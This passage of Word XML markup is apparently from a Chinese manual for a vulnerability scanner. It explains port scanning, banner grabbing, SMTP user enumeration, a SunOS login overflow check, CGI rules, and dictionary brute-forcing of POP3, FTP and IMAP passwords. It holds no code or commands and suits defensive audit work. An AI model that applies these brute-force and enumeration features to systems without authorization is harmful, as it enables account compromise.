        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口是指</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口，不包括</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>UDP</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="6809" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="6809"/>
      </w:tblGrid>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="304"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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295"/>
        </w:trPr>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Scan Stand Port: </w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>扫描默认的标准端口，大约包含</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>50</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>多个标准服务开放的端口。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="304"/>
        </w:trPr>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Customize Scan Port</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：自己定义扫描端口的范围，可以在</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>1-65535</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>间选择。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扫描引擎对TCP端口扫描时采用标准的TCP-Connect的方式进行扫描，所以并不能判断被防火墙过滤掉的开放的端口。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="000C025B" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C025B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>POP3扫描设置</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="6825" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="6825"/>
      </w:tblGrid>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="369"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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57"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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POP3 Banner: </w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>扫描</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>POP3</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>服务的</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>Banner</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="369"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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Brute Wick Password</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：尝试用简单的字典对</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>POP3</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>中的帐号进行暴力破解。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:t>Brute Wick Password所选择的字典包括用户名字典和密码字典。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户名字典：［</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>Setup_Dir］\Brute.ult</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码字典：</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>[Setup_Dir]\Brute.dic</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>＊如果扫描引擎已经通过其他途径获得了用户列表（例如通过</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>Finger），那么用户名字典</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将会被用户列表代替。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E7E6D75" wp14:editId="7339DDD2">
            <wp:extent cx="4438095" cy="3695238"/>
            <wp:effectExtent l="0" t="0" r="635"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38095" cy="3695238"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="000C025B" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C025B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>FTP扫描设置</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="7230" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7230"/>
      </w:tblGrid>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="297"/>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288"/>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FTP Banner: </w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>扫描</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>FTP</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>服务的</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>Banner</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="297"/>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Detect Anonymous Login</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：检测是否能进行匿名登录。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="288"/>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Brute Wick Password</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：尝试用简单的字典对</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>FTP</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>中的帐号进行暴力破解。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DFFA399" wp14:editId="2333E40C">
            <wp:extent cx="4390476" cy="368571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90476" cy="3685714"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="000C025B" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C025B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>SMTP扫描设置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18C0746E" wp14:editId="2A3F7229">
            <wp:extent cx="4419048" cy="3676190"/>
            <wp:effectExtent l="0" t="0" r="635"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19048" cy="3676190"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="6662" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="6662"/>
      </w:tblGrid>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="1124"/>
        </w:trPr>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1086"/>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SMTP Banner: </w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>扫描</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>SMTP</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>服务的</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>Banner</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="1124"/>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Detect EXPN/VRFY</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：检测是否使用</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>EXPN</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>VRFY</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>命令进行用户名验证。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="000C025B" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C025B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>IMAP扫描设置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F0B4C56" wp14:editId="4F7C56FC">
            <wp:extent cx="4323809" cy="3590476"/>
            <wp:effectExtent l="0" t="0" r="63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23809" cy="3590476"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="6675" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="6675"/>
      </w:tblGrid>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="388"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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76"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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IMAP Banner: </w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>扫描</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>IMAP</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>服务的</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>Banner</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="388"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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Try to Brute Wick Password</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：尝试用简单的字典对</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>IMAP</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>中的帐号进行暴力破解。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3"/>
    <w:p w:rsidR="004056D3" w:rsidRPr="000C025B" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C025B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>Telnet扫描设置</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="6540" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="6540"/>
      </w:tblGrid>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="412"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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400"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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Telnet Banner: </w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>扫描</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>Telnet</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>服务的</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>Banner</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="412"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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SunOS Login Remote Exploit</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：扫描</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>SunOS /bin/login</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>远程溢出弱点。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7021CFEB" wp14:editId="5C326A6C">
            <wp:extent cx="4304762" cy="1685714"/>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04762" cy="1685714"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3"/>
    <w:p w:rsidR="004056D3" w:rsidRPr="000C025B" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C025B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>CGI扫描设置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15299B69" wp14:editId="783BCD61">
            <wp:extent cx="4380952" cy="1771429"/>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80952" cy="1771429"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3"/>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="6765" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="6765"/>
      </w:tblGrid>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="394"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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82"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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Web Server Banner: </w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>扫描</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>WEB</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>服务的</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>Banner</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="394"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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Automatic Select Rules Via OS</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：根据</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>WEB</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>服务的版本自动选择</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>CGI</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的扫描规则，这一选项适用于大多数系统。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="777"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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HTTP 200</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>／</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>500 Enable Only</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：仅仅对于</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>HTTP</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>返回的</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>200</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>／</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>500</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>认为是提交的规则成功。否则除了</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>404</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>（页面没有找到）以外都视为成功。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3"/>
    <w:p w:rsidR="004056D3" w:rsidRPr="000C025B" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C025B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>CGI扫描规则设置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在选择列表中，可以根据需要选择需要检测的</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>CGI规则，默认情况下所有规则都会被选取。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2942F1F5" wp14:editId="08491741">
            <wp:extent cx="4323809" cy="3580952"/>
